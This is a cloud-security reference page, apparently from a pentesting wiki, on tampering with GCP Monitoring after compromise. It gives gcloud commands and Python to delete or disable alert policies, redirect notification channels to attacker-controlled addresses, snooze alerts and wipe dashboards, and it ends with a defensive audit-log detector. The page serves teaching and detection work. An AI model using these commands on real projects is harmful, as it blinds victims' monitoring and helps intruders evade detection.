GCP - Monitoring Post Exploitation


Monitoring

For more information, check:

GCP - Monitoring Enum

For other ways to disrupt logs, check:

GCP - Logging Post Exploitation

monitoring.alertPolicies.delete

Delete an alert policy:

gcloud alpha monitoring policies delete <policy>

monitoring.alertPolicies.update

Disrupt an alert policy:

To disrupt an alert policy, you can use the `monitoring.alertPolicies.update` method. This method allows you to modify the configuration of an existing alert policy, which can include disabling or modifying the conditions, actions, and notification channels associated with the policy.

To disrupt an alert policy, you need to provide the project ID, the alert policy ID, and the updated configuration. The updated configuration should include the changes you want to make to the policy.

Keep in mind that disrupting an alert policy can have consequences, such as disabling important notifications or triggering false alarms. Therefore, it is important to carefully review and test the changes before applying them.

Here is an example of how to use the `monitoring.alertPolicies.update` method to disrupt an alert policy:

```python
from google.cloud import monitoring_v3


def disrupt_alert_policy(project_id, policy_id, updated_config):
    # updated_config is an AlertPolicy-like object carrying the new
    # conditions and notification channels to write into the policy.
    client = monitoring_v3.AlertPolicyServiceClient()
    policy_name = client.alert_policy_path(project_id, policy_id)
    policy = client.get_alert_policy(name=policy_name)
    policy.conditions = updated_config.conditions
    # AlertPolicy has no "actions" field; notification_channels is where
    # the policy's routing lives.
    policy.notification_channels = updated_config.notification_channels
    # The client's keyword argument is alert_policy (not policy); without an
    # update_mask the whole policy is replaced.
    return client.update_alert_policy(alert_policy=policy)
```

In this example, the `disrupt_alert_policy` function takes the project ID, policy ID, and updated configuration as parameters. It creates a client for the `AlertPolicyService`, retrieves the existing alert policy using the provided project ID and policy ID, updates the policy's conditions and notification channels with the provided configuration (the `AlertPolicy` resource has no `actions` field), and finally writes the alert policy back using the `update_alert_policy` method.

Remember to handle any errors that may occur during the disruption process and to ensure that you have the necessary permissions to modify alert policies.

# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled

# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels

# Change notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>

monitoring.dashboards.update

Modify a dashboard to disrupt it:

# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
  widgets:
  - text:
      content: Hello World
'''

monitoring.dashboards.delete

Delete a dashboard:

# Delete dashboard
gcloud monitoring dashboards delete <dashboard>

monitoring.snoozes.create

Prevent policies from generating alerts by creating a snooze:

# Stop alerts by creating a snooze
gcloud monitoring snoozes create --display-name="Maintenance Week" \
    --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
    --start-time="2023-03-01T03:00:00.0-0500" \
    --end-time="2023-03-07T23:59:59.5-0500"

monitoring.snoozes.update

Update the timing of a snooze so that no alerts are created during the period the attacker cares about:

# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME

# Modify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>

monitoring.notificationChannels.delete

Delete a configured channel:

# Delete channel
gcloud alpha monitoring channels delete <channel>

monitoring.notificationChannels.update

Update a channel's labels to disrupt it:

# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
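A defender-side counterpart to the commands above, added here as an example (not HackTricks' code): a small detector that scans a JSON-lines export of Cloud Audit Logs for the monitoring permissions listed on this page and grades the alert-policy and channel edits that matter most. `protoPayload.serviceName`, `authorizationInfo[].permission` and `authenticationInfo.principalEmail` are standard Admin Activity audit-log fields; the layout of `protoPayload.request` (`alertPolicy.enabled`, `updateMask`, `notificationChannel.labels`) is an assumption, and the sample entries are constructed.

```python
import json

# Permissions from this page; audit logs record them in protoPayload.authorizationInfo[].permission.
WATCHED = {f"monitoring.{r}" for r in (
    "alertPolicies.delete", "alertPolicies.update", "dashboards.update",
    "dashboards.delete", "snoozes.create", "snoozes.update",
    "notificationChannels.delete", "notificationChannels.update")}

def classify(entry):
    """Return findings (dicts) for one audit-log entry, or [] if not relevant."""
    p = entry.get("protoPayload", {})
    if p.get("serviceName") != "monitoring.googleapis.com":
        return []
    granted = {a.get("permission") for a in p.get("authorizationInfo", []) if a.get("granted")}
    actor = p.get("authenticationInfo", {}).get("principalEmail", "unknown")
    req, findings = p.get("request", {}), []
    for perm in sorted(granted & WATCHED):
        detail, severity = "", "HIGH"
        if perm == "monitoring.alertPolicies.update":
            # Disabling the policy or changing where it notifies is the damaging
            # case; other edits (display name, thresholds) are downgraded to MEDIUM.
            if req.get("alertPolicy", {}).get("enabled") is False:
                detail = "policy disabled"
            elif "notificationChannels" in str(req.get("updateMask", "")):
                detail = "notification channels replaced or cleared"
            else:
                severity = "MEDIUM"
        elif perm == "monitoring.notificationChannels.update":
            labels = req.get("notificationChannel", {}).get("labels", {})
            detail = "email_address -> " + labels.get("email_address", "(other labels)")
        findings.append({"permission": perm, "actor": actor, "severity": severity, "detail": detail})
    return findings

def scan(log_lines):
    """Apply classify() to a JSON-lines export of audit logs (e.g. from a log sink)."""
    return [f for line in log_lines for f in classify(json.loads(line))]

def _entry(perm, actor="svc@example.iam.gserviceaccount.com", **request):
    """Build a constructed audit-log entry with one granted permission (test data only)."""
    return {"protoPayload": {"serviceName": "monitoring.googleapis.com",
                             "authenticationInfo": {"principalEmail": actor},
                             "authorizationInfo": [{"permission": perm, "granted": True}],
                             "request": request}}

# Constructed samples: a policy disabled, an email channel re-pointed outside, and a read that must not fire.
SAMPLE_LINES = [json.dumps(e) for e in (
    _entry("monitoring.alertPolicies.update", alertPolicy={"enabled": False}, updateMask="enabled"),
    _entry("monitoring.notificationChannels.update",
           notificationChannel={"labels": {"email_address": "attacker@example.com"}}),
    _entry("monitoring.alertPolicies.get"))]
```

Route the findings to a sink that the monitoring project itself cannot silence (a separate project or an external SIEM), since every control on this page lives inside the project an attacker already has permissions in.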